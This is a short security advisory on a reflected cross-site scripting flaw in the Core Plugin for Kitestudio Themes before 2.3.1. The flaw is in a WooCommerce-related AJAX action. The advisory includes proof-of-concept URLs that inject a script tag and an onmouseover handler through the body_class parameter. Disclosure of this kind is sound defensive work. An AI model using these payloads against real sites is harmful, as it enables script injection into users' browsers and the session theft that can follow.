Core Plugin for Kitestudio Themes < 2.3.1 - Reflected Cross-Site-Scripting

The plugin does not sanitise and escape some parameters before outputting them back in a response of an AJAX action, available to both unauthenticated and authenticated users when a premium theme from the vendor is active, leading to a Reflected Cross-Site Scripting.

PoC

Install and active the dependencies: a premium theme (or the teta-lite one), as well as the WooCommerce plugin, then open the below URL as either an unauthenticated or authenticated user v < 2.3 - https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&amp;atts;[body_class]="><script>alert(`xss`)</script> v < 2.3.1 (will only works against unauthenticated users as a nonce is needed) - https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&amp;kite;_nonce=xxxxx&amp;atts;[body_class]="onmouseover=alert(/XSS/)//